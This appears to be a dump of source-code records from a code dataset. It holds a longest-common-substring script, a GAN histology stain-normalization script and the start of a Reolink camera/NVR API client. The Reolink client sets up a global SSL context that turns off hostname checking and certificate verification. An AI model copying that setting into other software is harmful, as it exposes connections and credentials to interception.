X[:m - 1] and Y[:n- 1]\n dp[m][n] = 1 + lcs_contiguous_memoized(X, Y, m - 1, n - 1, dp)\n return dp[m][n]\n\n dp[m][n] = max(lcs_contiguous_memoized(X, Y, m, n - 1, dp), lcs_contiguous_memoized(X, Y, m - 1, n, dp))\n return dp[m][n]\n\n\nif __name__ == '__main__':\n S1 = \"AGGTAB\"\n S2 = \"GXTXAYB\"\n m = len(S1)\n n = len(S2)\n res_non_contiguous = longest_common_substr_non_contiguous(S1=S1, S2=S2, n=len(S1), m=len(S2))\n res = largest_common_substr_contiguous(S1=S1, S2=S2, n=m, m=n)\n g4g_res = lcs_contiguous_memoized(X=S1, Y=S2, m=m, n=n,\n dp=[[-1 for i in range(n + 1)]for j in range(m + 1)])\n 
print(0)","repo_name":"GabCaz/quant-algorithms","sub_path":"dynamic-programming/longest_common_substring.py","file_name":"longest_common_substring.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20292641060","text":"# +\nimport os\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torchvision\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nimport utils\nfrom arch import define_Gen, define_Dis\nimport kornia\nimport pandas as pd\nimport warnings\n\nimport torch.nn.functional as F\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport argparse\nfrom PIL import Image\nimport random\n# -\n\nwarnings.filterwarnings('ignore')\n\n\nclass Arguments(object):\n def __init__(self, dictionary):\n \"\"\"Constructor\"\"\"\n for key in dictionary:\n setattr(self, key, dictionary[key])\n\n\n# +\n\nargs = {\n 'epochs': 10,\n 'decay_epoch': 9,\n 'batch_size': 1,\n 'lr': 0.0002,\n 'load_height': 128,\n 'load_width': 128,\n 'gpu_ids': '0',\n 'crop_height': 128,\n 'crop_width': 128,\n 'alpha': 10, # Cyc loss\n 'beta': 5, # Scyc loss\n 'gamma': 5, # Dssim loss \n 'delta': 0.5, # Identity\n 'training': True,\n 'testing': True,\n 'results_dir': '/project/DSone/as3ek/data/ganstain/CCHMC_vsi_svs/results/',\n 'dataset_dir': '/project/DSone/as3ek/data/ganstain/CCHMC_vsi_svs/',\n 'checkpoint_dir': '/project/DSone/as3ek/data/ganstain/CCHMC_vsi_svs/checkpoint/',\n 'norm': 'batch',\n 'use_dropout': False,\n 'ngf': 64,\n 'ndf': 64,\n 'gen_net': 'unet_128',\n 'dis_net': 'n_layers',\n 'self_attn': True,\n 'spectral': True,\n 'log_freq': 50,\n 'custom_tag': '',\n 'gen_samples': False,\n 'specific_samples': False\n}\n\n\nargs = Arguments(args)\n\n\n# SOURCE AND TARGET FOLDERS\nsource_path = '/project/DSone/as3ek/data/patches/1000/classification/cinn_celiac__normal/valid/celiac/'\ntarget_path = '/project/DSone/as3ek/data/patches/1000/gan_normalized/cinn_celiac__normal/valid/celiac/'\ntrain_valid_split = 1\nsize = 256\none_direction = False # If this is false. b -> a -> b will happen. 
Edit code for otherwise.\ngen_name = 'Gba' # Gba to generate b given a, i.e., a -> b\nfolder_to_folder = True\n\nif not os.path.exists(target_path):\n os.makedirs(target_path)\n\ntag1 = 'noattn'\nif args.self_attn:\n tag1 = 'attn'\n\ntag2 = 'nospec'\nif args.spectral:\n tag2 = 'spectral'\n\n# Generate paths for checkpoint and results\nargs.identifier = str(args.gen_net) + '_' + str(args.dis_net) + '_' \\\n+ str(args.lr) + '_' + args.norm + '_' + tag1 + '_' + tag2 + '_' + str(args.batch_size) + '_' \\\n+ str(args.load_height) + '_coefs_' + str(args.alpha) + '_' + str(args.beta) + '_' + str(args.gamma) + '_'\\\n+ str(args.delta) + '_' + args.custom_tag\n\nargs.checkpoint_path = args.checkpoint_dir + args.identifier\nargs.results_path = args.results_dir + args.identifier\n\nargs.gpu_ids = []\nfor i in range(torch.cuda.device_count()):\n args.gpu_ids.append(i)\n \ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# -\n\nif one_direction:\n G = define_Gen(input_nc=3, output_nc=3, ngf=args.ngf, netG=args.gen_net, norm=args.norm, \n use_dropout= args.use_dropout, gpu_ids=args.gpu_ids, self_attn=args.self_attn, spectral = args.spectral)\nelse:\n Gab = define_Gen(input_nc=3, output_nc=3, ngf=args.ngf, netG=args.gen_net, norm=args.norm, \n use_dropout= args.use_dropout, gpu_ids=args.gpu_ids, self_attn=args.self_attn, spectral = args.spectral)\n Gba = define_Gen(input_nc=3, output_nc=3, ngf=args.ngf, netG=args.gen_net, norm=args.norm, \n use_dropout= args.use_dropout, gpu_ids=args.gpu_ids, self_attn=args.self_attn, spectral = args.spectral)\n\nckpt = utils.load_checkpoint('%s/latest.ckpt' % (args.checkpoint_path))\nif one_direction:\n G.load_state_dict(ckpt[gen_name])\n G.eval()\nelse:\n Gab.load_state_dict(ckpt['Gab'])\n Gba.load_state_dict(ckpt['Gba'])\n Gab.eval()\n Gba.eval()\nprint('Eval mode')\n\n# +\nbiopsy_patch_no_map = {}\nbiopsy_target_map = {}\n\ntransform = transforms.Compose([\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])\n])\n\nfor i, patch_name in enumerate(os.listdir(source_path)):\n if not folder_to_folder:\n # Check if patch should be sent to valid for every patch from new patient\n if patch_name.split('__')[0] not in biopsy_patch_no_map: \n biopsy_patch_no_map[patch_name.split('__')[0]] = 0\n if random.randint(1, 10) > train_valid_split*10:\n biopsy_target_map[patch_name.split('__')[0]] = 'train'\n else:\n biopsy_target_map[patch_name.split('__')[0]] = 'valid'\n # Keeping track of number of patches per biopsy crop \n biopsy_patch_no_map[patch_name.split('__')[0]] += 1\n \n img = Image.open(source_path + patch_name)\n img = img.convert('RGB')\n img = img.resize((size, size))\n img = np.array(img)\n img = img.transpose(2, 0, 1)\n img = img / 255.\n img = torch.FloatTensor(img).to(device)\n image = transform(img)\n image = image.unsqueeze(0)\n if one_direction or patch_name.startswith('C'):\n out = Gba(image)\n else:\n out = Gab(image)\n out = Gba(out)\n if not folder_to_folder:\n biopsy_target_path = target_path.replace('train', biopsy_target_map[patch_name.split('__')[0]])\n torchvision.utils.save_image((out + 1)/2, biopsy_target_path + patch_name)\n else:\n biopsy_target_path = target_path\n torchvision.utils.save_image((out + 1)/2, biopsy_target_path + patch_name)\n if i % 1000 == 0:\n print(i)\n# 
-\n\nos.listdir(source_path)[0].split('__')\n\n\n","repo_name":"4m4n5/saasn-stain-normalization","sub_path":"normalize_patches.py","file_name":"normalize_patches.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"23352354660","text":"\"\"\" Reolink NVR/camera network API \"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nimport base64\nimport hashlib\nimport logging\nimport ssl\nimport traceback\nimport uuid\nfrom datetime import datetime, timedelta, tzinfo\nfrom os.path import basename\nfrom typing import Any, Literal, Optional, overload\nfrom urllib import parse\nfrom xml.etree import ElementTree as XML\nfrom statistics import mean\n\nfrom orjson import JSONDecodeError, loads as json_loads # pylint: disable=no-name-in-module\nimport aiohttp\n\nfrom . import templates, typings\nfrom .enums import DayNightEnum, StatusLedEnum, SpotlightModeEnum, PtzEnum, GuardEnum, TrackMethodEnum, SubType\nfrom .exceptions import (\n ApiError,\n CredentialsInvalidError,\n InvalidContentTypeError,\n InvalidParameterError,\n LoginError,\n NoDataError,\n NotSupportedError,\n ReolinkError,\n SubscriptionError,\n UnexpectedDataError,\n ReolinkConnectionError,\n ReolinkTimeoutError,\n)\nfrom .software_version import SoftwareVersion, NewSoftwareVersion, MINIMUM_FIRMWARE\nfrom .utils import datetime_to_reolink_time, reolink_time_to_datetime\n\nMANUFACTURER = \"Reolink\"\nDEFAULT_STREAM = \"sub\"\nDEFAULT_PROTOCOL = \"rtmp\"\nDEFAULT_TIMEOUT = 30\nRETRY_ATTEMPTS = 3\nMAX_CHUNK_ITEMS = 40\nDEFAULT_RTMP_AUTH_METHOD = \"PASSWORD\"\nSUBSCRIPTION_TERMINATION_TIME = 15 # minutes\nLONG_POLL_TIMEOUT = 5 # minutes\n\nMOTION_DETECTION_TYPE = \"motion\"\nFACE_DETECTION_TYPE = \"face\"\nPERSON_DETECTION_TYPE = \"person\"\nVEHICLE_DETECTION_TYPE = \"vehicle\"\nPET_DETECTION_TYPE = \"pet\"\nVISITOR_DETECTION_TYPE = \"visitor\"\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER_DATA = logging.getLogger(__name__ + \".data\")\n\nSSL_CONTEXT = ssl.create_default_context()\nSSL_CONTEXT.set_ciphers(\"DEFAULT\")\nSSL_CONTEXT.check_hostname = False\nSSL_CONTEXT.verify_mode = ssl.CERT_NONE\n\n# with 2 streaming channels\nDUAL_LENS_DUAL_MOTION_MODELS: set[str] = {\n \"Reolink Duo PoE\",\n \"Reolink Duo WiFi\",\n}\nDUAL_LENS_SINGLE_MOTION_MODELS: set[str] = {\n \"Reolink TrackMix PoE\",\n \"Reolink TrackMix WiFi\",\n \"RLC-81MA\",\n}\nDUAL_LENS_MODELS: set[str] = DUAL_LENS_DUAL_MOTION_MODELS | DUAL_LENS_SINGLE_MOTION_MODELS\n\n\n##########################################################################################################################################################\n# API class\n##########################################################################################################################################################\nclass Host:\n \"\"\"Reolink network API class.\"\"\"\n\n def __init__(\n self,\n host: str,\n username: str,\n password: str,\n port: Optional[int] = None,\n use_https: Optional[bool] = None,\n protocol: str = DEFAULT_PROTOCOL,\n stream: str = DEFAULT_STREAM,\n timeout: int = DEFAULT_TIMEOUT,\n rtmp_auth_method: str = DEFAULT_RTMP_AUTH_METHOD,\n aiohttp_get_session_callback=None,\n ):\n self._send_mutex = asyncio.Lock()\n self._login_mutex = asyncio.Lock()\n self._long_poll_mutex = asyncio.Lock()\n\n ##############################################################################\n # Host\n self._url: str = \"\"\n self._use_https: Optional[bool] = use_https\n self._host: str = host\n 
self._port: Optional[int] = port\n self._rtsp_port: Optional[int] = None\n self._rtmp_port: Optional[int] = None\n self._onvif_port: Optional[int] = None\n self._rtsp_enabled: Optional[bool] = None\n self._rtmp_enabled: Optional[bool] = None\n self._onvif_enabled: Optional[bool] = None\n self._mac_address: Optional[str] = None\n\n self.refresh_base_url()\n\n ##############################################################################\n # Login session\n self._username: str = username\n self._password: str = password[:31]\n self._token: Optional[str] = None\n self._lease_time: Optional[datetime] = None\n # Connection session\n self._timeout: aiohttp.ClientTimeout = aiohttp.ClientTimeout(total=timeout)\n if aiohttp_get_session_callback is not None:\n self._get_aiohttp_session = aiohttp_get_session_callback\n else:\n self._get_aiohttp_session = lambda: aiohttp.ClientSession(timeout=self._timeout, connector=aiohttp.TCPConnector(ssl=SSL_CONTEXT))\n self._aiohttp_session: aiohttp.ClientSession = self._get_aiohttp_session()\n\n ##############################################################################\n # NVR (host-level) attributes\n self._is_nvr: bool = False\n self._nvr_name: str = \"\"\n self._nvr_serial: Optional[str] = None\n self._nvr_model: Optional[str] = None\n self._nvr_num_channels: int = 0\n self._nvr_hw_version: Optional[str] = None\n self._nvr_sw_version: Optional[str] = None\n self._nvr_sw_version_object: Optional[SoftwareVersion] = None\n self._nvr_sw_hardware_id: Optional[int] = None\n self._nvr_sw_model_id: Optional[int] = None\n\n ##############################################################################\n # Channels of cameras, used in this NVR ([0] for a directly connected camera)\n self._GetChannelStatus_present: bool = False\n self._GetChannelStatus_has_name: bool = False\n self._channels: list[int] = []\n self._stream_channels: list[int] = []\n self._channel_names: dict[int, str] = {}\n self._channel_models: dict[int, str] = {}\n self._is_doorbell: dict[int, bool] = {}\n\n ##############################################################################\n # API-versions and capabilities\n self._api_version: dict[str, int] = {}\n self._abilities: dict[str, Any] = {} # raw response from NVR/camera\n self._capabilities: dict[int | str, list[str]] = {\"Host\": []} # processed by construct_capabilities\n\n ##############################################################################\n # Video-stream formats\n self._stream: str = stream\n self._protocol: str = protocol\n self._rtmp_auth_method: str = rtmp_auth_method\n self._rtsp_mainStream: dict[int, str] = {}\n self._rtsp_subStream: dict[int, str] = {}\n\n ##############################################################################\n # Presets\n self._ptz_presets: dict[int, dict] = {}\n\n ##############################################################################\n # Saved info response-blocks\n self._hdd_info: Optional[dict] = None\n self._local_link: Optional[dict] = None\n self._wifi_signal: Optional[int] = None\n self._users: Optional[dict] = None\n\n ##############################################################################\n # Saved settings response-blocks\n # Host-level\n self._time_settings: Optional[dict] = None\n self._host_time_difference: float = 0\n self._ntp_settings: Optional[dict] = None\n self._netport_settings: Optional[dict] = None\n # Camera-level\n self._zoom_focus_settings: dict[int, dict] = {}\n self._zoom_focus_range: dict[int, dict] = {}\n self._auto_focus_settings: dict[int, dict] = 
{}\n self._isp_settings: dict[int, dict] = {}\n self._ftp_settings: dict[int, dict] = {}\n self._osd_settings: dict[int, dict] = {}\n self._push_settings: dict[int, dict] = {}\n self._enc_settings: dict[int, dict] = {}\n self._ptz_presets_settings: dict[int, dict] = {}\n self._ptz_guard_settings: dict[int, dict] = {}\n self._ptz_position: dict[int, dict] = {}\n self._email_settings: dict[int, dict] = {}\n self._ir_settings: dict[int, dict] = {}\n self._status_led_settings: dict[int, dict] = {}\n self._whiteled_settings: dict[int, dict] = {}\n self._recording_settings: dict[int, dict] = {}\n self._md_alarm_settings: dict[int, dict] = {}\n self._ai_alarm_settings: dict[int, dict] = {}\n self._audio_settings: dict[int, dict] = {}\n self._audio_alarm_settings: dict[int, dict] = {}\n self._buzzer_settings: dict[int, dict] = {}\n self._auto_track_settings: dict[int, dict] = {}\n self._auto_track_range: dict[int, dict] = {}\n self._auto_track_limits: dict[int, dict] = {}\n self._audio_file_list: dict[int, dict] = {}\n self._auto_reply_settings: dict[int, dict] = {}\n\n ##############################################################################\n # States\n self._motion_detection_states: dict[int, bool] = {}\n self._ai_detection_support: dict[int, dict[str, bool]] = {}\n\n ##############################################################################\n # Camera-level states\n self._ai_detection_states: dict[int, dict[str, bool]] = {}\n self._visitor_states: dict[int, bool] = {}\n\n ##############################################################################\n # SUBSCRIPTION managing\n self._subscribe_url: Optional[str] = None\n\n self._subscription_manager_url: dict[str, str] = {}\n self._subscription_termination_time: dict[str, datetime] = {}\n self._subscription_time_difference: dict[str, float] = {}\n self._onvif_only_motion = {SubType.push: True, SubType.long_poll: True}\n self._log_once: list[str] = []\n\n ##############################################################################\n # Properties\n @property\n def host(self) -> str:\n return self._host\n\n @property\n def username(self) -> str:\n return self._username\n\n @property\n def use_https(self) -> Optional[bool]:\n return self._use_https\n\n @property\n def port(self) -> Optional[int]:\n return self._port\n\n @property\n def onvif_port(self) -> Optional[int]:\n return self._onvif_port\n\n @property\n def rtmp_port(self) -> Optional[int]:\n return self._rtmp_port\n\n @property\n def rtsp_port(self) -> Optional[int]:\n return self._rtsp_port\n\n @property\n def onvif_enabled(self) -> Optional[bool]:\n return self._onvif_enabled\n\n @property\n def rtmp_enabled(self) -> Optional[bool]:\n return self._rtmp_enabled\n\n @property\n def rtsp_enabled(self) -> Optional[bool]:\n return self._rtsp_enabled\n\n @property\n def mac_address(self) -> Optional[str]:\n return self._mac_address\n\n @property\n def serial(self) -> Optional[str]:\n return self._nvr_serial\n\n @property\n def wifi_connection(self) -> bool:\n \"\"\"LAN or Wifi\"\"\"\n if self._local_link is None:\n return False\n\n return self._local_link[\"LocalLink\"][\"activeLink\"] != \"LAN\"\n\n @property\n def wifi_signal(self) -> Optional[int]:\n \"\"\"wifi_signal 0-4\"\"\"\n return self._wifi_signal\n\n @property\n def is_nvr(self) -> bool:\n return self._is_nvr\n\n @property\n def nvr_name(self) -> Optional[str]:\n if not self._is_nvr and self._nvr_name == \"\":\n if len(self._channels) > 0 and self._channels[0] in self._channel_names:\n return 
self._channel_names[self._channels[0]]\n\n return \"Unknown\"\n return self._nvr_name\n\n @property\n def sw_version(self) -> Optional[str]:\n return self._nvr_sw_version\n\n @property\n def sw_version_object(self) -> SoftwareVersion:\n if self._nvr_sw_version_object is None:\n return SoftwareVersion(None)\n\n return self._nvr_sw_version_object\n\n @property\n def sw_version_required(self) -> SoftwareVersion:\n \"\"\"Return the minimum required firmware version for proper operation of this library\"\"\"\n if self.model is None or self.hardware_version is None:\n return SoftwareVersion(None)\n\n return SoftwareVersion(MINIMUM_FIRMWARE.get(self.model, {}).get(self.hardware_version))\n\n @property\n def sw_version_update_required(self) -> bool:\n \"\"\"Check if a firmware version update is required for proper operation of this library\"\"\"\n if self._nvr_sw_version_object is None:\n return False\n\n return not self._nvr_sw_version_object >= self.sw_version_required # pylint: disable=unneeded-not\n\n @property\n def model(self) -> Optional[str]:\n return self._nvr_model\n\n @property\n def hardware_version(self) -> Optional[str]:\n return self._nvr_hw_version\n\n @property\n def manufacturer(self) -> str:\n return MANUFACTURER\n\n @property\n def num_channels(self) -> int:\n \"\"\"Return the total number of channels in the NVR (should be 1 for a standalone camera, maybe 2 for DUO cameras).\"\"\"\n return self._nvr_num_channels\n\n @property\n def num_cameras(self) -> int:\n \"\"\"Return the number of channels IN USE in that NVR (should be 1 for a standalone camera, maybe 2 for DUO cameras).\"\"\"\n return len(self._channels)\n\n @property\n def channels(self) -> list[int]:\n \"\"\"Return the list of indices of channels in use.\"\"\"\n return self._channels\n\n @property\n def stream_channels(self) -> list[int]:\n \"\"\"Return the list of indices of stream channels available.\"\"\"\n return self._stream_channels\n\n @property\n def hdd_info(self) -> Optional[dict]:\n return self._hdd_info\n\n @property\n def stream(self) -> str:\n return self._stream\n\n @property\n def protocol(self) -> str:\n return self._protocol\n\n @property\n def session_active(self) -> bool:\n if self._token is not None and self._lease_time is not None and self._lease_time > (datetime.now() + timedelta(seconds=5)):\n return True\n return False\n\n @property\n def timeout(self) -> float:\n if self._timeout.total is None:\n return DEFAULT_TIMEOUT\n return self._timeout.total\n\n @property\n def user_level(self) -> str:\n \"\"\"Check if the user has admin authorisation.\"\"\"\n if self._users is None or len(self._users) < 1:\n return \"unknown\"\n\n for user in self._users:\n if user[\"userName\"] == self._username:\n return user[\"level\"]\n\n return \"unknown\"\n\n @property\n def is_admin(self) -> bool:\n \"\"\"\n Check if the user has admin authorisation.\n Only admin users can change camera settings, not everything will work if account is not admin\n \"\"\"\n return self.user_level == \"admin\"\n\n def timezone(self) -> Optional[tzinfo]:\n \"\"\"Get the timezone of the device\n\n Returns None if there is no current time information\n \"\"\"\n if self._time_settings is None:\n return None\n return typings.Reolink_timezone(self._time_settings)\n\n def time(self) -> Optional[datetime]:\n \"\"\"Get the approximate \"current\" time of the device using existing data.\n\n Returns None if there is no current time information.\n\n When None is returned async_get_time can be used to request the current camera time\n \"\"\"\n if 
self._time_settings is None:\n return None\n # the _host_time_difference is basically the diff in \"localtime\" between the system and the device\n # so we will add that then set the tzinfo to our timezone rule so the resulting time\n # can be converted to other timezones correctly\n return (datetime.now() + timedelta(seconds=self._host_time_difference)).replace(tzinfo=self.timezone())\n\n async def async_get_time(self) -> datetime:\n \"\"\"Get the current time of the device\n\n The preferred method is to check get_time first, and if it returns none; call this, to save\n an async round trip to the device.\n \"\"\"\n await self.get_state(\"GetTime\")\n if self._time_settings is None:\n raise NotSupportedError(f\"get_time: failed to retrieve current time settings from {self._host}:{self._port}\")\n return reolink_time_to_datetime(self._time_settings[\"Time\"]).replace(tzinfo=self.timezone())\n\n ##############################################################################\n # Channel-level getters/setters\n\n def camera_name(self, channel: int | None) -> Optional[str]:\n if channel is None:\n return self.nvr_name\n\n if channel not in self._channel_names and channel in self._stream_channels and channel != 0:\n return self.camera_name(0) # Dual lens cameras\n if channel not in self._channel_names:\n if len(self._channels) == 1:\n return self.nvr_name\n return \"Unknown\"\n return self._channel_names[channel]\n\n def camera_model(self, channel: int) -> Optional[str]:\n if channel not in self._channel_models and channel in self._stream_channels and channel != 0:\n return self.camera_model(0) # Dual lens cameras\n if channel not in self._channel_models:\n return \"Unknown\"\n return self._channel_models[channel]\n\n def is_doorbell(self, channel: int) -> bool:\n \"\"\"Wether or not the camera is a doorbell\"\"\"\n return channel in self._is_doorbell and self._is_doorbell[channel]\n\n def motion_detected(self, channel: int) -> bool:\n \"\"\"Return the motion detection state (polled).\"\"\"\n return channel in self._motion_detection_states and self._motion_detection_states[channel]\n\n def ai_detected(self, channel: int, object_type: str) -> bool:\n \"\"\"Return the AI object detection state (polled).\"\"\"\n if channel not in self._ai_detection_states or self._ai_detection_states[channel] is None:\n return False\n\n for key, value in self._ai_detection_states[channel].items():\n if key == object_type or (object_type == PERSON_DETECTION_TYPE and key == \"people\") or (object_type == PET_DETECTION_TYPE and key == \"dog_cat\"):\n return value\n\n return False\n\n def ai_detection_states(self, channel: int) -> dict[str, bool]:\n \"\"\"Return all the AI object detection state.\"\"\"\n return self._ai_detection_states[channel]\n\n def visitor_detected(self, channel: int) -> bool:\n \"\"\"Return the visitor detection state (polled).\"\"\"\n return channel in self._visitor_states and self._visitor_states[channel]\n\n def ai_supported(self, channel: int, object_type: Optional[str] = None) -> bool:\n \"\"\"Return if the AI object type detection is supported or not.\"\"\"\n if channel not in self._ai_detection_support or not self._ai_detection_support[channel]:\n return False\n\n if object_type is not None:\n for key, value in self._ai_detection_support[channel].items():\n if key == object_type or (object_type == PERSON_DETECTION_TYPE and key == \"people\") or (object_type == PET_DETECTION_TYPE and key == \"dog_cat\"):\n return value\n return False\n\n return True\n\n def ai_supported_types(self, channel: 
int) -> list[str]:\n \"\"\"Return a list of supported AI types.\"\"\"\n if channel not in self._ai_detection_support:\n return []\n\n ai_types = []\n for key, value in self._ai_detection_support[channel].items():\n if value:\n ai_types.append(key)\n\n return ai_types\n\n def audio_alarm_enabled(self, channel: int) -> bool:\n if channel not in self._audio_alarm_settings:\n return False\n\n if self.api_version(\"GetAudioAlarm\") >= 1:\n return self._audio_alarm_settings[channel][\"Audio\"][\"enable\"] == 1\n\n return self._audio_alarm_settings[channel][\"Audio\"][\"schedule\"][\"enable\"] == 1\n\n def ir_enabled(self, channel: int) -> bool:\n return channel in self._ir_settings and self._ir_settings[channel][\"IrLights\"][\"state\"] == \"Auto\"\n\n def status_led_enabled(self, channel: int) -> bool:\n if channel not in self._status_led_settings:\n return False\n\n if self.is_doorbell(channel):\n return self._status_led_settings[channel][\"PowerLed\"].get(\"eDoorbellLightState\", \"Off\") == \"On\"\n\n return self._status_led_settings[channel][\"PowerLed\"].get(\"state\", \"Off\") == \"On\"\n\n def doorbell_led(self, channel: int) -> str:\n if channel not in self._status_led_settings:\n return \"Off\"\n\n return self._status_led_settings[channel][\"PowerLed\"].get(\"eDoorbellLightState\", \"Off\")\n\n def ftp_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetFtp\") >= 1:\n return all(self._ftp_settings[ch][\"Ftp\"][\"enable\"] == 1 for ch in self._channels if ch in self._ftp_settings)\n\n return all(self._ftp_settings[ch][\"Ftp\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._ftp_settings)\n\n if channel not in self._ftp_settings:\n return False\n\n if self.api_version(\"GetFtp\") >= 1:\n return self._ftp_settings[channel][\"Ftp\"][\"scheduleEnable\"] == 1\n\n return self._ftp_settings[channel][\"Ftp\"][\"schedule\"][\"enable\"] == 1\n\n def email_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetEmail\") >= 1:\n return all(self._email_settings[ch][\"Email\"][\"enable\"] == 1 for ch in self._channels if ch in self._email_settings)\n\n return all(self._email_settings[ch][\"Email\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._email_settings)\n\n if channel not in self._email_settings:\n return False\n\n if self.api_version(\"GetEmail\") >= 1:\n return self._email_settings[channel][\"Email\"][\"scheduleEnable\"] == 1\n\n return self._email_settings[channel][\"Email\"][\"schedule\"][\"enable\"] == 1\n\n def push_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetPush\") >= 1:\n return all(self._push_settings[ch][\"Push\"][\"enable\"] == 1 for ch in self._channels if ch in self._push_settings)\n\n return all(self._push_settings[ch][\"Push\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._push_settings)\n\n if channel not in self._push_settings:\n return False\n\n if self.api_version(\"GetPush\") >= 1:\n return self._push_settings[channel][\"Push\"][\"scheduleEnable\"] == 1\n\n return self._push_settings[channel][\"Push\"][\"schedule\"][\"enable\"] == 1\n\n def recording_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetRec\") >= 1:\n return all(self._recording_settings[ch][\"Rec\"][\"enable\"] == 1 for ch in self._channels if ch in self._recording_settings)\n\n return 
all(self._recording_settings[ch][\"Rec\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._recording_settings)\n\n if channel not in self._recording_settings:\n return False\n\n if self.api_version(\"GetRec\") >= 1:\n return self._recording_settings[channel][\"Rec\"][\"scheduleEnable\"] == 1\n\n return self._recording_settings[channel][\"Rec\"][\"schedule\"][\"enable\"] == 1\n\n def buzzer_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n return all(self._buzzer_settings[ch][\"Buzzer\"][\"enable\"] == 1 for ch in self._channels if ch in self._buzzer_settings)\n\n if channel not in self._buzzer_settings:\n return False\n\n return self._buzzer_settings[channel][\"Buzzer\"][\"scheduleEnable\"] == 1\n\n def whiteled_state(self, channel: int) -> bool:\n return channel in self._whiteled_settings and self._whiteled_settings[channel][\"WhiteLed\"][\"state\"] == 1\n\n def whiteled_mode(self, channel: int) -> Optional[int]:\n if channel not in self._whiteled_settings:\n return None\n\n return self._whiteled_settings[channel][\"WhiteLed\"].get(\"mode\")\n\n def whiteled_mode_list(self, channel: int) -> list[str]:\n mode_values = [SpotlightModeEnum.off, SpotlightModeEnum.auto, SpotlightModeEnum.schedule]\n if self.api_version(\"supportLightAutoBrightness\", channel) > 0:\n mode_values.extend([SpotlightModeEnum.adaptive, SpotlightModeEnum.autoadaptive])\n return [val.name for val in mode_values]\n\n def whiteled_brightness(self, channel: int) -> Optional[int]:\n if channel not in self._whiteled_settings:\n return None\n\n return self._whiteled_settings[channel][\"WhiteLed\"].get(\"bright\")\n\n def whiteled_schedule(self, channel: int) -> Optional[dict]:\n \"\"\"Return the spotlight state.\"\"\"\n if channel in self._whiteled_settings:\n return self._whiteled_settings[channel][\"WhiteLed\"][\"LightingSchedule\"]\n\n return None\n\n def whiteled_settings(self, channel: int) -> Optional[dict]:\n \"\"\"Return the spotlight state.\"\"\"\n if channel in self._whiteled_settings:\n return self._whiteled_settings[channel]\n\n return None\n\n def daynight_state(self, channel: int) -> Optional[str]:\n if channel not in self._isp_settings:\n return None\n\n return self._isp_settings[channel][\"Isp\"][\"dayNight\"]\n\n def backlight_state(self, channel: int) -> Optional[str]:\n if channel not in self._isp_settings:\n return None\n\n return self._isp_settings[channel][\"Isp\"][\"backLight\"]\n\n def audio_record(self, channel: int) -> bool:\n if channel not in self._enc_settings:\n return False\n\n return self._enc_settings[channel][\"Enc\"][\"audio\"] == 1\n\n def volume(self, channel: int) -> int:\n if channel not in self._audio_settings:\n return 100\n\n return self._audio_settings[channel][\"AudioCfg\"][\"volume\"]\n\n def doorbell_button_sound(self, channel: int) -> bool:\n if channel not in self._audio_settings:\n return False\n\n return self._audio_settings[channel][\"AudioCfg\"].get(\"visitorLoudspeaker\") == 1\n\n def quick_reply_dict(self, channel: int) -> dict[int, str]:\n if channel not in self._audio_file_list:\n return {}\n\n audio_dict = {-1: \"off\"}\n for audio_file in self._audio_file_list[channel][\"AudioFileList\"]:\n audio_dict[audio_file[\"id\"]] = audio_file[\"fileName\"]\n return audio_dict\n\n def quick_reply_enabled(self, channel: int) -> bool:\n if channel not in self._auto_reply_settings:\n return False\n\n return self._auto_reply_settings[channel][\"AutoReply\"][\"enable\"] == 1\n\n def quick_reply_file(self, channel: int) -> int | None:\n 
\"\"\"Return the quick replay audio file id, -1 means quick replay is off.\"\"\"\n if channel not in self._auto_reply_settings:\n return None\n\n return self._auto_reply_settings[channel][\"AutoReply\"][\"fileId\"]\n\n def quick_reply_time(self, channel: int) -> int:\n if channel not in self._auto_reply_settings:\n return 0\n\n return self._auto_reply_settings[channel][\"AutoReply\"][\"timeout\"]\n\n def audio_alarm_settings(self, channel: int) -> dict:\n if channel in self._audio_alarm_settings:\n return self._audio_alarm_settings[channel]\n\n return {}\n\n def md_sensitivity(self, channel: int) -> int:\n if channel not in self._md_alarm_settings:\n return 0\n\n if self.api_version(\"GetMdAlarm\") >= 1:\n if self._md_alarm_settings[channel][\"MdAlarm\"].get(\"useNewSens\", 0) == 1:\n return 51 - self._md_alarm_settings[channel][\"MdAlarm\"][\"newSens\"][\"sensDef\"]\n\n sensitivities = [sens[\"sensitivity\"] for sens in self._md_alarm_settings[channel][\"MdAlarm\"][\"sens\"]]\n return 51 - mean(sensitivities)\n\n sensitivities = [sens[\"sensitivity\"] for sens in self._md_alarm_settings[channel][\"Alarm\"][\"sens\"]]\n return 51 - mean(sensitivities)\n\n def ai_sensitivity(self, channel: int, ai_type: str) -> int:\n if channel not in self._ai_alarm_settings or ai_type not in self._ai_alarm_settings[channel]:\n return 0\n\n return self._ai_alarm_settings[channel][ai_type][\"sensitivity\"]\n\n def ai_delay(self, channel: int, ai_type: str) -> int:\n \"\"\"AI detection delay time in seconds\"\"\"\n if channel not in self._ai_alarm_settings or ai_type not in self._ai_alarm_settings[channel]:\n return 0\n\n return self._ai_alarm_settings[channel][ai_type][\"stay_time\"]\n\n def zoom_range(self, channel: int) -> dict:\n return self._zoom_focus_range[channel]\n\n def enable_https(self, enable: bool):\n self._use_https = enable\n self.refresh_base_url()\n\n def refresh_base_url(self):\n if self._use_https:\n self._url = 